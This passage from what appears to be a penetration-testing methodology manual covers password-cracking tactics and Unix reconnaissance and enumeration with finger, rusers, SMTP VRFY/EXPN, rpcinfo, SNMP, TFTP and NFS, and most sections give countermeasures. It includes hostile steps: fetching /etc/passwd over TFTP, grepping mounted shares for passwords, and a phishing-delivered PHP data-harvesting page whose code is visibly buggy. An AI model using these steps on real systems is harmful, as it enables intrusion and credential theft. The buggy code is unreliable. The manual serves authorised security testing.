Remember, the tactic highly depends on hash types and, depending on your needs, this
phase may include a brute-force using an alphanumeric charset for 7 bytes LM
passwords. Such crack takes roughly 4 hours on my P4-3GHz, while the same brute
using “alphanumeric + common symbols” takes a bit less than two days (a good job for a
weekend!).
D.5.7 “Instant” cracking
If you have a lot of hashes, you should design the tactic to discover most
passwords before proceeding with “instant” cracking. On the other side, if you
have only one hash you may prefer to perform instant cracking in an early stage of
the tactic.
Either way, you can calculate in advance what is the number of hashes where it is
convenient to switch to brute-force instead of an instant cracking using the same
charset.
For example, suppose you experiment an alphanum charset with an instant cracking
software, and its performance is 6 pwd/minute. If on the same PC you brute-force all
alphanumeric passwords in 4 hours, in the same time you will crack 1440 (6*60*4)
Page 340 of 1123
passwords using the instant cracker. So, in this example, if you have roughly more than
1500 passwords it is convenient to brute them, otherwise it is faster to do an instant
cracking. This is the argument I use to decide where in the tactic I should place an
instant cracking phase.
Every now and then someone puts Rainbow Tables online, and it’s normal to expect
others will be more or less freely available soon. Jérôme Athias kindly put online freely
downloadable LM rainbow tables for alphanum+sym32 with “honest” success rate
(Jérôme
declares approximately 60%) here: http://wired.s6n.com/files/jathias/ . With
such tables the cracking performances I experimented is roughly 3 pwd/hour on a P4
(Gentoo Linux). Please note the charset used by Jérôme includes the Euro symbol (€). I
didn’t experimented deeply with those tables, but the Euro symbol is Unicode and it
causes the LM hash to disappear (only the NTLM hash remains), so I think it is at least a
(little) waste of time (if not worse, because the space symbol is placed after the Euro in
the charset and I am curious to debug rcrack to see what is the real effect of this on the
loaded charset).
Having more than one Rainbow Table set already available (for example
alphabetic,
alphanumeric,
alphanum+sym14
and
alphanum+sym32),
and
depending on the number of hashes remaining, you may want to insert more
instant cracking phases, especially after “quick and dirty” and “incremental”
phases.
D.5.8 Advanced Brute-force attempts
After the final Rainbow cracking phase, the only thing you can do is to go on with bruteforcing.
Here you have two options: do a generic brute force which needs a lot of time, or try
some alchemy based on previous results.
My alchemist preferred tool is Lepton’s Crack, thanks to its RegEx support. Here are
some attempts you can experiment:
•
If you eavesdropped an admin while typing the password, you can try to build
some RegEx based on supposed password beginning or ending.
Page 341 of 1123
•
Supposing you didn’t find the password with above mentioned Athias Rainbow
Tables, you can 90% assume the password isn’t alphanum+sym32, so it
probably contains one (or more) characters out of that charset. Start trying with
some RegEx containing one keyboard symbol not in sym32 (accented vowels or
special characters if in Europe, other less common symbols), and then try with
symbols not included on keyboards.
This is the time to unleash your fantasy, or your social engineering skills ;-)
D.6 FINAL NOTES
During the review of this document someone asked me: “If this document is aimed at
beginners to intermediate professionals, how do you define an advanced professional
password cracker?”
Well, I think such professional is who build itself the tools he needs. Sure, not always
from scratch; there is good OpenSource out there!
By building your own tools, you can solve cracking puzzles others can’t. For me it has
been every time a interesting challenge and a way to learn more and more...
Piero Brunati
Page 342 of 1123
Page 343 of 1123
E UNIX /LINUX SYSTEM SECURITY ASSESSMENT
Description
UNIX systems are attacked more often than windows system. There are certain reasons
related to this:
•
Open Source: As UNIX (especially open source UNIX like systems) is open source
more bugs are found in the source code and exploited. The advantage of open
source is that it keeps UNIX safe as the source code is many times tested and also
UNIX administrators are more security conscious and patch the system as soon as
bug is released. If no patch is available, it is probably ready in a couple of hours. Or
less, some times.
•
Availability: There are more GNU Linux and UNIX boxes connected to the internet.
Objective
•
To Follow a structured approach for Unix system penetration/audit
•
To Gain initial access and then escalate privileges to systems
•
To Go beyond root and spread the attack further to other systems or levels
•
To Understand Unix Security issues and Safeguard Methods
Expected Result[s]
•
List of live hosts
•
Processes running on hosts
•
List of users/shares
•
List of Networks, Hosts and their relations
•
Version of kernel used in operating systems and their patch level
•
Vendor of operating system
•
Vendor of third party and/or additional software
•
List of vulnerabilities
•
List of compromised hosts
E.1 METHODOLOGY
There are no methodic procedures to gain root access to a system. However,
vulnerabilities have existed that allowed remote root access with the simple execution of
Page 344 of 1123
an exploit. Anyway, if a system had this vulnerability, it would be easily spotted at first
hand if it was well known, and closed. But an attacker would try to get in via other
means, or vulnerabilities, and our job is to try to secure the box/network fully. Not only
it's “remote root” vulnerabilities.
However, we can provide you with a basic idea or guide that you could folllow, like this
one:
1. Identify Live Hosts
2. Identify Ports and Services
3. Enumeration Procedure
a. Identify Users
b. Identify e-Mail accounts
c. Identify Administrators
d. Identify Networks and Domains
4. Examine Common Protocols (for probable future covert channels operation)
5. Examine Unix
ƒ
Remote Attacks
a.
Password Attacks
b.
Denial of Service Attacks (do not do this unless explicitly allowed)
c.
RPC Attacks
d.
Buffer overflow Attacks
e.
Heap overflow Attacks
f.
Integer overflow Attacks
g.
Format string Attacks
h.
Web Server Attacks
i.
Mail Server Attacks
j.
X11-insecurities
k.
NFS Share Attacks
•
Local Attacks
a. File and Directory Permission Attacks
b. Symlink attacks
c. Race condition attacks
d. System call attacks
e. Key logger attacks
f.
Booting from other operating system
Page 345 of 1123
Page 346 of 1123
E.2 IDENTIFY LIVE HOSTS
Being able to map the network of the target, both public and private, will provide us with
the basic elements to initiate a full attack, and to organize it properly. One needs to split
among servers, desktops and devices (like routers, switches, printers, etc). It is always
important to remember that we must set an objective and use the resources and
information we find in the way to accomplish it. Among the different approaches to live
host enumeration we can use: Passive Scans (which additionally provides information on
how much certain servers are used) and Active Scans. Let's start with the later:
Active Scans
Specifically, the word "Active" denotes actions that, when done, make the target
receive packets generated, direct or indirectly, by us.
Active Scans are those where we use tools like NMap (www.insecure.org/nmap) to scan
a range of IP Addresses with different scanning methods. Of course, you may know one
IP address and/or hostname for your target. We can use host/nslookup and/or dig to find
additional hosts in the target's network. Let's take a host which has a vulnerable DNS
server on it "NS" records as an example:
Target: somesite.dom
nslookup -type=NS somesite.dom will provide us with the NS records for somesite.dom.
The NS records tell us which are the addresses (canonical) of the nameservers
somesite.dom uses to store it's DNS information. In case we get ns1.provider.net and
ns2.provider.net as nameservers, we need to get their IP addresses (which can be
multiple if a round robin A record is used for each name), so we can do a zone transfer
(AXFR) against those nameservers, the authoritative ones for somesite.dom, and get a
listing of all DNS records of somesite.dom:
nslookup -type=A ns1.provider.net
Page 347 of 1123
Now we have the IP address(es) for ns1.provider.net. Let's use that on a host command
to do an AXFR transfer:
host -l somesite.dom IP_OF_NS1_PROVIDER_NET
If the nameserver AND firewall are both misconfigured (that is, no access control rules
for zone transfers are set on the nameserver(s) and no matching rules are set on the
firewall for the filtering of port 53/tcp, the one used for zone transfers), then we shall get
the forementioned listing. The operation can be repeated against the other nameservers,
and the results saved on separete files. This way we may, additionally, discover if the
nameserver manager(s) have a proper, redundant, nameserver setup.
It is a good idea to try to discover at what are the system administrators good at.
This way, we can better plan the attack.
On the other side, quite a typical situation is that an enterprise does usually hire more
than one public IP addresses, and usually, the provider assigns a block (technically
speaking, a subnet with 24 or less bits for its length). For example, if you have the
company website at "www.somesite.dom", and it corresponds to one public IP address
x.y.z.204, then you should traceroute to it, see which is the previous hop to the last one.
If it is from the same subnet, then it may probably be the company router and/or firewall.
An nmap operating system scan (nmap's -O option) will probe helpful. Additionally, the
difference between the web server's ip address and the router's may provide an idea of
how big the assigned subnet is. A service scan, banner gathering and port 80 browsing
on the other IPs in or near that range may help you assign the IPs to your target's IP
pool.
As you can see, the Identify Live Hosts section does sometimes overlap with the Identify
Ports and Services. Active scans are usually like this.
Passive Scans
If you are inside your target's network, in the same switch, or hub, you may be able to
make use of the passive scan technique, where no packet is sent to the network, but
your network adapter, in combination with a good sniffer like ettercap, will take packets
Page 348 of 1123
that you're network adapter reads, thus showing the found IP addresses and optionally
OS-fingerprinting them. It uses the "legal" traffic the host sees to make the scan, thus
being "passive".
We will talk more about sniffers and such ahead in this document.
Page 349 of 1123
E.3 IDENTIFY PORTS AND SERVICES
We are all used to match ports and services when generally used. We know SMTP runs
on port 25, SSH on port 22, HTTP on port 80, and so. But some administrators, who take
the Security through Obscurity approach (not a good idea), usually move non-internetvital services, like ssh, to other ports. That's why it is usually important to do a two-stage
port scan:
In the first scan, we search for common ports, for example, using nmap's -F switch. If we
find or sense that more services should probably be running, we may start a second
(and maybe subsequent) scans, to map the whole port range (tcp and udp), from 1 to
65535. Nmap's -sV switch will additionally gather banners and do service detection over
non-standard ports, and will provide a piece of read bytes from the connection when it
cannot determine the service running on it. Please, try out Nmap's -T parameter, which
allows you to slow down a scan. Of course, it will take longer to finish, but it'll be
stealthier. Additionally, the -f parameter, to use packet fragmentation during the scan,
will help with some IDSes.
The most important aspect from port and service scanning relates to the knowledge of
the system administrator we get. You can think of an equation where you fill in the
"unnecesarry services open to the world" and "old software versions" values. It is
important to understand or get to know the sysadmin: it will prove helpful when you get
into the system. More on this later…
E.4 ENUMERATION ATTACK
Enumeration attacks are used to get information from the related service. For example,
from NetBIOS we can get Shares, computer names, server names, OS release, etc.
From finger, we can get usernames and how long and how much they work on the
system. We will provide examples of different types of enumeration.
E.4.1 Identify Users
Page 350 of 1123
Description
Example methodology for User Enumeration
Objective
To take advantage of mis-configurations on different services / protocols (see Process)
to get deeper knowlege of user base. And probably know if accounts apart from root are
used at all. Many times GNU+Linux based boxes are set up as firewalls, VPN Servers or
gateways, thus local users not being much used.
Expected Result[s]
Usernames, Email Addresses, login/logout time, Plan files, Default Shell.
Pre-Requisite
Ports of services in Process should be open from our perspective.
Process
•
finger
•
rwho
•
ruser
•
SMTP
•
rpcinfo
Page 351 of 1123
E.4.1.1 USER IDENTIFICATION: FINGER
Description
Finger services expose system user information to any entity on the network. Finger
works on port 79 TCP/UDP by default.
Helps attacker to guess user accounts by performing guessing usernames.
Inform attacker if user has new email.
Helps attacker to guess the operating system.
Options:
#finger -l @target.com
#finger -l root@target.com
#finger -l 'a b c d e f g h'@target.com (Solaris Vulnerability)
Examples/Results
# finger root@target.com
Login: root
Name: root
Directory: /root
Shell: /bin/bash
On since Mon Oct 13 22:06 (IST) on tty1 54 seconds idle
On since Mon Oct 13 23:53 (IST) on tty2 17 minutes 4 seconds idle
On since Mon Oct 13 23:39 (IST) on tty3 4 hours 56 minutes idle
On since Mon Oct 13 23:39 (IST) on tty4 4 hours 56 minutes idle
On since Mon Oct 13 22:06 (IST) on :0 (messages off)
On since Mon Oct 13 22:34 (IST) on pts/0 from :0.0
50 minutes 6 seconds idle
On since Tue Oct 14 04:20 (IST) on pts/2 from 203.124.156.112
30 minutes 15 seconds idle
On since Tue Oct 14 00:46 (IST) on pts/5 from :0.0
1 hour 7 minutes idle
Mail last read Tue Oct 14 04:04 2003 (IST)
No Plan.
# finger @target.com
Login: broot
Name: Mr. Root
Directory: /root
Shell: /bin/bash
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
Login: nonroot
Directory: /nonexistent
Never logged in.
No Plan.
Name: Non-root root user for NFS
Shell: nologin
Login: root
Name: Mr. Root
Directory: /root
Shell: /bin/sh
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
# finger 'a b c d e f g h'@www. sun-target.com
Page 352 of 1123
Analysis/Conclusion/Observation
ƒ
Finger daemon is running on target system
ƒ
root user is logged in into the system
Countermeasures
ƒ
Use xinetd/tcpwarppers as per your need to control the access services based on
followings:
ƒ
Host/IP
ƒ
Users
ƒ
User Group
ƒ
Access Time
ƒ
Strongly recommended to block the port on External Router/Firewall.
ƒ
Disable the service if not used from /etc/inetd.conf and restart the inetd process. This
is only for Sun OS and some flavors of Linux
ƒ
Disable the service if not used from /etc/xinetd.conf (or delete the file finger from
xinetd.d) and restart the xinetd process.
ƒ
Run the service on non-standard port from /etc/services. Make sure there are
administrative problems with this. Client need to run the service on the same port as
server.
ƒ
Give access on need to know basis on specific interface using xinetd/tcpwrappers or
any firewall (iptables)
ƒ
For Solaris Vulnerability apply the relevant patches from Sun Microsystems.
http://archives.neohapsis.com/archives/vulnwatch/2001-q4/0016.html
Remarks
By setting up a fake finger daemon, if finger is not really needed, we can provide
attackers with false information, and additionally we could redirect their attention to other
host, like a honeypot.
Page 353 of 1123
E.4.1.2 USER IDENTIFICATION: RWHO
Description
This is similar to finger. Attack is only for local segment. It’s a remote connecty of who
command. It’s a combination of who information from all of the systems in the local
network running rwho server(daemon). It works on udp port 513.
Steps to be performed
#rwho -a wally becky smith
Examples / Results
#rwho -a wally becky smith
becky
smith
wally
wally
cygnus:pts0 Jan 17 11:20 :12
aquila:ttyp0 Jan 15 09:52 :22
lyra:pts7
Jan 17 13:15 1:32
lyra:pts8
Jan 17 14:15 1:01
Analysis/Conclusion/Observation
As you can see wally becky and smith are online and wally is idle for more than one
hour. These are the details we can use to check who is watching and who is active.
Countermeasure
ƒ
Disable the rwho service if not used from /etc/inetd.conf and restart the inetd
process. This is only for Sun OS and some flavors of Linux.
ƒ
Use xinetd/tcpwarppers as per your need to control the access services based on
followings:
ƒ
Host/IP
ƒ
Users
ƒ
User Group
ƒ
Access Time
ƒ
Recommended to block the port on External Router/Firewall.
ƒ
Disable the service if not used from /etc/xinetd.conf (or delete the file finger from
xinetd.d) and restart the xinetd process.
Page 354 of 1123
ƒ
Run the service on non-standard port from /etc/services. Make sure there are
administrative problems with this. Client need to run the service on the same port as
server.
ƒ
Give access on need to know basis on specific interface using xinetd/tcpwrappers or
any firewall (iptables)
Page 355 of 1123
E.4.1.3 USER IDENTIFICATION: RUSER
Description
This is similar to who but only of local network. It is used to provide information on who is
currently logged into the systems in the local network. Works on udp port 513.
Steps to be performed
ƒ
#rusers –a <target IP>
ƒ
#rusers -l <target IP>
Examples / Results - 1
#rusers –a <target IP>
[root@localhost root]# rusers -a 192.168.0.60
192.168.0.60
root root root root gaurav
Analysis/Conclusion/Observation
This will comeup with usernames with the corresponding hostnames, and the hostnames
even if no one is loggd on to them. The host names are useful to map the network
completely. The usernames as usual comes handy while trying to gain access.
Examples / Results - 1
#rusers -l <target>
[root@localhost root]# rusers -l 192.168.0.60
root
192.168.0.60:tty1
May 11 22:02
:01
root
192.168.0.60:pts/0
May 12 02:00
:01 (192.168.0.100)
root
192.168.0.60:pts/1
May 12 00:35
:16 (192.168.0.1)
root
192.168.0.60:pts/2
May 12 01:39
:15 (192.168.0.70)
gaurav 192.168.0.60:pts/3
May 12 01:41
(192.168.0.1)
Analysis/Conclusion/Observation
This will produce a list of users sorted alphabetically by hostname.
Countermeasure
Disable the service if not necessary to be used
Page 356 of 1123
ƒ
Disable the rusers service if not used from /etc/inetd.conf and restart the inetd
process. This is only for Sun OS and some flavors of Linux.
ƒ
Use xinetd/tcpwarppers as per your need to control the access services based on
followings:
ƒ
Host/IP
ƒ
Users
ƒ
User Group
ƒ
Access Time
ƒ
Recommended to block the port on External Router/Firewall.
ƒ
Disable the service if not used from /etc/xinetd.conf (or delete the file finger from
xinetd.d) and restart the xinetd process.
ƒ
Run the service on non-standard port from /etc/services. Make sure there are
administrative problems with this. Client need to run the service on the same port as
server.
ƒ
Give access on need to know basis on specific interface using xinetd/tcpwrappers or
any firewall (iptables)
Page 357 of 1123
E.4.1.4 USER IDENTIFICATION: SMTP
Description
Simple Mail Transfer Protocol service works on Port 25 and supports VRFY, EXPN,
ESMTP, HELP, and/or EHLO
The EXPN and VRFY commands can be used for user enumeration.
EXPN Command
A remote attacker can use EXPN command to find mail aliases. He can find username
that is mapped to the administrator account on the mail server.
VRFY Command
A remote attacker can get first and last name registered to any email account. These
names can also be used in social engineering attackes.
Steps to be performed
ƒ
telnet <target> 25
ƒ
vrfy $user
NOTE: Replace $user with an username.
Examples / Results
"telnet target 25".
vrfy user
This will produce an output like:
250 kartikeya puri <user@target>
expn all
250-someone somewhere <user@target1>
250-another guy <root@target1>
250-yetanotehr guy <guest@target2>
250-real babe babe@babevilla
Analysis/Conclusion/Observation
Many a times users tend to keep their passwords as a combination of their full name.
This information can be used for social engineering attacks as well.
Page 358 of 1123
Another magic command is expn. It is similar to the vrfy command, except that in the
case of a mailing list, or expansion list, it will show all the members of that list. The
SMTP expn command causes the MTA to expand (show all the recipients) of an
address. To illustrate the risk, consider that many sites have aliases that include all or a
large segment of users. Such aliases often have easily guessed names, such as all (as
used in above example), everyone, users, subscribers or staff. A simple probe to all
gave the list of users under that alias.
Countermeasure
ƒ
Disable the VRFY and EXPN command using SMTP Server’s manual. CVE: CAN1999-0531
Page 359 of 1123
E.4.1.5 USER IDENTIFICATION: RPCINFO
Description
Say there is this remote host and we don't know usernames as previous methods have
failed us. Say during our investigation we came across the fact that this server is running
portmap. Woudn't it be nice if we can know the name of the programs running so we can
try the exploits for those services and there will be no need to wait for cracking the
usernames and passwords. All we need to do is probe the target for rpc information.
Steps to be performed
#rpcinfo -p target
Examples / Results - 1
#rpcinfo -p target
program vers proto port
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100232 10 udp 32772 sadmind
100221 1 tcp 32772
100068 2 udp 32773
100068 3 udp 32773
100068 4 udp 32773
100068 5 udp 32773
300326 4 tcp 32773
100249 1 udp 32778
100249 1 tcp 32779
300598 1 udp 32781
300598 1 tcp 32780
805306368 1 udp 32781
805306368 1 tcp 32780
Analysis/Conclusion/Observation
This will probe the portmap service on the host target using Version 2 of the portmap
protocol and displays a list of all registered RPC programs. Remember that NFS runs on
RPC. If the mountd RPC process is listed, a showmount -e $target may probe useful.
Countermeasure
Restrict access from perimeter firewall / router, or any unnecessary location.
Stop portmap service if RPC is not used. Remember following important programs uses
RPC
NFS, NIS, Wall, NIS, rstatd, r services,
Page 360 of 1123
Remark
This service has history of vulnerabilities and it is attacker’s prime target.
Further Reading and Links
SANS TOP-20: www.sans.org/top20
Page 361 of 1123
E.5 EXAMINE COMMON PROTOCOLS
SNMP
TFTP
FTP
SMTP
HTTP
NNTP
Telnet
Layer 2 Protocols
E.5.1 Examine SNMP Service
Description
Simple network management protocol. A boon for administrators who need it and know
how to use it and a curse for someone who is not really carefull with it. SNMP uses
community names, there are two, one is public an another private. Both communities
have their permissions of read and write. By default the snmp community strings in some
servers are "private" and "public". Compromising SNMP community strings makes a
major dent in the over all security. Guessing a community string with write privilege is
similar to compromising a box. It can be used to identify operating sytem, user/share
eumration, uptime, systemname, services,modify configuration of device (router, firewall,
etc).
Objective
To obtain configuration details and write access to devices
Expected Result[s]
Depending on device type
Pre-Requisite
SNMP service should be running on the target machine
Process:
1. Determine SNMP community strings on the target
Page 362 of 1123
2. Get MIB values by SNMPwalking and pilfer for information
3. Compromise the System
E.5.1.1 DETERMINE SNMP COMMUNITY STRINGS ON THE TARGET
Description
This can be achieved in two ways:
1. Guess Community strings
2. Bruteforce Community string
3. OS scan the device, try to discover Vendor and use Default Password Lists
4. Sniffing.
Examples / Results
http://www.securiteam.com/tools/5EP0N154UC.html
Analysis/Conclusion/Observation
E.5.1.2 GET MIB VALUES BY SNMPWALKING AND PILFER FOR INFORMATION
1. Identify Operating System
2. Identify Server Uptime
3. Identify Processes / Services
4. Identify Shares
5. Identify users
Examples / Results - 1
PHP function for SNMP walk
Description:
PHP have the inbuilt function for performing SNMP walking. The format for snmpwalk
function is array snmpwalk (string hostname, string community, string object_id [, int
timeout [, int retries]])
Page 363 of 1123
A Snipet from PHP manual for snmpwalk says "Returns an array of SNMP object values
starting from the object_id as root and FALSE on error."
snmpwalk() function is used to read all the values from an SNMP agent specified by the
hostname. Community specifies the read community for that agent. A NULL object_id is
taken as the root of the SNMP objects tree and all objects under that tree are returned
as an array. If object_id is specified, all the SNMP objects below that object_id are
returned.
Pre-requisite
One needs to know the community names. If the default community names "private" and
"public" are enabled, then the following code will work just fine.
Steps To be performed:
1. Change the public or private string names if needed.
2. Host the page on a web-server with PHP4 support.
3. Trick the user into using this page. ( a forged email can be used)
4. Download data.txt for reading the results.
<?php
ip = getip();
$filename = "data.txt";
// Getting the ip of target machine
// this file needs to reside on server
$useragent = $_SERVER['HTTP_USER_AGENT'];
// capturing the browser name (for
OS guessing)
$date = date("F j, Y, g:i a");
// to keep track of who visited the page when
$fh = fopen($filename, "a") or die("Internal error");
$a = snmpwalk('$ip', "public", "") or die("Internal Error");
$b = snmpwalk('$ip', "private","") or die("Internal Error");
for ($i=0; $i < count($a); $i++) {
echo $a[$i];
$data = $ip . "|" . $useragent . "|" . $date . "|" . $a[i] . "\n";
fwrite($fh , $data) or die("Internal Error");
}
for ($i=0; $i < count($b); $i++) {
echo $b[$i];
Page 364 of 1123
$data = $ip . "|" . $useragent . "|" . $date . "|" . $b[i] . "\n";
fwrite($fh , $data) or die ("Internal Error");
}
fclose($fh);
echo "This page is down for maintainence";
//the following function will get machines ip, depending upon the settings. Thanks
Shaolin Tiger for help with this bit.
function getip()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"),
"0.0.0.0"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") &&
strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "0.0.0.0"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"),
"0.0.0.0"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR']
&& strcasecmp($_SERVER['REMOTE_ADDR'], "0.0.0.0"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "0.0.0.0";
return($ip);
}
?>
Analysis/Conclusion/Observation
Attacker sends a malicious link to target. Target clicks on it and inline code is executed;
it collects sensitive information from the target and send it to attacker. This is evading
proxy/firewall in the process.
Page 365 of 1123
Countermeasure
•
If the service is not absolutely required, disable it.
•
Filter SNMP (TCP/UDP 161, 162) traffic at firewall. Allow trusted subnets to poll or
manage devices externally unless it cannot be avoided.
•
Consider Community strings as important as passwords and apply the same best
practices. (secret = secre?t)
•
Try using SNMP v3 with message authentication and PDU encryption.
•
Deploy host based firewall (access control system) to filter SNMP traffic
•
Try to make MIBs read-only wherever it’s possible
Further Readings
Cisco’s paper on SNMP
Using SNMP for Reconnaissance
E.5.2 Examine Trivial File Transfer Protocol (TFTP)
Description
TFTP uses UDP for data transfer and it is a connection less protocol, which doesn’t
support authentication. TFTP is a limited FTP service with no authentication. It supports
very limited set of commands. It is commonly used by Routers, Switches and other
devices to connect to a TFTP server during Firmware upgrade.
Objective
To retrieve files without authentication issues
Expected Result[s]
Information that may be used to further compromise the system: configuration files, logs,
etc.
Pre-Requisite
Page 366 of 1123
A TFTP server accessible by us on the target's network or related sites
Process:
1. Accessing TFTP Prompt
2. Checking own machine’s status
3. Connecting to TFTP Server
4. Guessing and grabbing the file
E.5.2.1 ACCESSING TFTP PROMPT
Examples / Results
#tftp
tftp>_
Analysis/Conclusion/Observation
The attacker is at tftp prompt. Now next step is checking the status.
E.5.2.2 CHECKING OWN MACHINE’S STATUS
Examples / Results
tftp>status
Not connected.
Mode: netascii Verbose: off Tracing: off
Max-timeout: 25 seconds
tftp> _
Analysis/Conclusion/Observation
Status check is performed, now the attacker nows timeout values and the various
attributes.
E.5.2.3 CONNECTING TO TFTP SERVER
Examples / Results
tftp> connect < target IP >
Analysis/Conclusion/Observation
The same prompt (tftp>_) will appear again. It indicates that attacker is connected to
target.
Page 367 of 1123
E.5.2.4 GUESSING AND GRABBING THE FILE
Description
In this step an attacker needs to guess relevant file with path. Most of the time files are
located in their default location[s]. File names are easy to guess.
Examples / Results
tftp>get /etc/passwd /tmp/passwd.system
Analysis/Conclusion/Observation
Attacker successfully downloaded the password file. Same way any other file can also
be downloaded given the mis-configuration of permissions.
Countermeasure
ƒ
TFTP is plain text; consider using secure tftp as an alternative.
ƒ
Restrict access to TFTP server in your firewall / router
ƒ
Move sensitive files from their default locations
ƒ
Define access level on files
ƒ
In case of Linux /etc/tftpaccess.ctl
Page 368 of 1123
E.6 EXAMINING UNIX SYSTEM
Description
After examining common protocols now check for UNIX specific attack. They can be
further sub divided into two categories 1. Remote and 2. Local attacks
E.6.1 Remote Attacks
Description
Remote Attacks are usually considered more dangerous as attacker needs not to be
present physically, but a local attack may probe equally dangerous if physical security
aspect is not taken into account. Hard to trace because of legal, physical and staging
(attacking from compromised hosts) constraints.
E.6.2 Password Attacks
Social Engineering, Trashing, Guessing, Sniffering, Cracking and Brute Forcing are all
activities related to the art of retrieving passwords. But thhere have existed
vulnerabilities, for example, in older versions of the ICQ protocol, that allowed anyone to
bypass system authentication by taking advantage of vulnerabilities at that stage. For
example, in the forementioned ICQ vulnerability, the maximum password length was 8. If
you used an alternative ICQ client (at that time the excellent mICQ), you could provide a
9-chars password to take over any ICQ User ID. This vulnerability had a related buffer
overflow. See the next point.
E.6.3 Buffer Overflows
Description
Buffer overflows are caused when the data copied from a source buffer to destination
Buffer lacks bounds checking and it overwrites critical areas of memory which result in
taking control of the target program by changing the return address of a function, and
make it execute at an attacker-defined buffer full of so-called "shellcode".
Page 369 of 1123
Technically speaking, buffers are often placed next to "interesting" data structures by the
compiler. For example, in the case of a function that has a buffer on the stack, the
function's return address is placed in memory after the buffer. So, if the attacker can
overflow the buffer, he can overwrite the function return address so that when the
function returns, it returns to an address determined by the attacker. Other interesting
data structures include C++ v-tables, exception handler addresses, function pointers.
Buffer overflows are the most common programming errors, which lead to exploiting Of a
target program and privilege escalation, A mapping is made for programs which are
running with elevated privileges and the binary is checked for buffer mismanagement.
E.6.4 Stack based Overflows
Buffer overflows are classified into stack and heap overflows, the nature of the overflow
is dependent on the allocation of memory.
The actual placement on the stack are established by the commands
PUSH AND POP, respectively. A value that is pushed on to the stack is copied into the
memory location (exact reference) and is pointed to as execution occurs by the stack
pointer (sp). The sp will then be decremented as the stack sequentially moves down,
making room for the next local variables to be added (subl $20,%esp). POP is the
reverse of such an event. This is dealing with the LIFO queues, Last In First Out,
referring to how the operations are ordered on the stack.
Stack based are relatively simple in terms of concept, these include functions such as:
strcat(), sprint(), strcpy(), gets(), etc. - anywhere where unchecked variables are placed
into a buffer of fixed length. A common practice is to use the n-variant of those functions:
strncat, snprintf, strncpy, fgets instead of gets, etc.
E.6.5 Heap based Overflows
Dynamically allocated variables those allocated by malloc () are created on the
heap. Unlike the stack, the heap grows upwards on most systems; that is, new variables
created on the heap are located at higher memory addresses than older ones. In a
Page 370 of 1123
simple heap-based buffer overflow attack, an attacker overflows a buffer that is lower on
the heap, overwriting other dynamic variables.. different operating systems use various
malloc implementations, for eg : Linux uses dug lea malloc implementation where as
windows uses RTLheap implementation.
Some applications do request a block of memory using the malloc interface, which later
happens to be vulnerable to a buffer overflow. This way, the data behind the chunk can
be changed. Possibly the malloc management structures can be compromised,
exploiting malloc allocated buffer overflows is to modify this management information in
a way that will allow arbitrary memory overwrites afterwards. This way pointer can be
overwritten within the writeable process memory, hence allowing modification of return
addresses, linkage tables or application level data.
E.6.6 Integer Overflows
Integer overflows are not like most common bug classes. They do not allow direct
overwriting of memory or direct execution flow control, but are much more subtle. The
root of the problem lies in the fact that there is no way for a process to check the result of
a computation after it has happened, so there may be a discrepancy between the stored
result and the correct result.
In Typical integer overflow attacker overflows the buffer by triggering an arithmetic
issues relating to integers, most of the times count loops. Use input as loop bound;
hence a buffer is overflowed on iterations. Of the loop resulting in an overflow, integer
overflows also occur while allocating data using some form of integer arithmetic while
doing a dynamic memory allocation like malloc and alloc.
E.6.7 Format String Attacks
In c and c++ programming language it is possible to declare functions that have a
variable number of parameters, on call one fixed argument has to tell the function.
How many arguments there actually are a few examples of these functions a re Printf() ,
sprintf() , wsprintf() , the first parameter is called the format string a format is a varying
data type, which is written to the output stream any missing data type of the format string
Page 371 of 1123
lets you manipulate the stack By using different format data types in the c/c++ language,
Format string attacks are mainly due to programming errors caused by Missing the
format data type.
The attacker can manipulate the stack and result in exploiting the program when such
subtle errors are made, the attacked can exploit if he can control the target buffer where
the format conversion was missing.
E.6.8 Parsing Errors
Parsing errors are mainly caused due to missing sanity checking on the input passed to
the buffer; most of the time the program accepts buffer and then parses the Buffer and
passes it to the program, when the buffer is user controllable and it passes through a
parsing routine the attacker can craft the buffer to exploit the
parsing function and thereby overflow the buffer of the target program.
E.6.9 NFS Share Attacks
•
Determine mount points
Showmount -e
o
Determine nfs command setup
o
cd /etc and cat passwd
o
Change value of UID / GID to privileged user other than root UID 2, GID 2
o
Execute nfs client
o
NFS Vulnerabilities
1.
Normally because of segfault
2.
Miscreant user may craft BO by abusing SUID root programs
E.6.10
Examine NFS Share
Description
Take advantage of incorrect /etc/exports configuration.
Objective
Page 372 of 1123
Mount remote filesystems, download all relevant files, modify system configuration.
Expected Result[s]
Shell Access to the system.
Pre-Requisite
ƒ
NFS Share should be enabled
ƒ
Access to service shall be given
Process:
1. Enumerate share on target
2. Mount the share
3. Pilfer for information
1. Enumerate share on target
Examples / Results
#showmount -e target
Analysis/Conclusion/Observation
This prints all directories that are exported for either a local system or a remote system.
Systems that do not export directories to specific clients are particularly vulnerable
because the output of the showmount command reveals that any client on the network
can mount the directory. Anyone on the same network can have access to shares,
depending upon access control.
2. Mount the share
Examples / Results
#mount -t nfs target:/share /mnt
Analysis/Conclusion/Observation
If the permissions of /share are not proper it will be completely on testers mercy. To
avoid this make sure that each exported dir. have proper permission in terms of who can
read that directory and who can not. Define strict rules because it pays to be paranoid.
3. Pilfer for information
Examples / Results
#find /mnt | grep –i password
Page 373 of 1123
Analysis/Conclusion/Observation
Attackers search for the ocurence of the word password in the mounted share. The
above command will print the lines which contains “password”, from all files in /share.
Countermeasure
•
Make sure each exported directory has permissions on need to know basis. In terms
of mounting, reading, writing and executing.
•
Eliminate world writ-able 777 directories/files.
E.6.11
X-Insecurities
Description
The X Window System provides a wealth of features that allow many programs to
share a single graphical display. The major problem with X is that its security model is an
all-or-nothing approach. Once a client is granted access to an X server, pandemonium
can ensue. X clients can capture the keystrokes of the console user, kill windows,
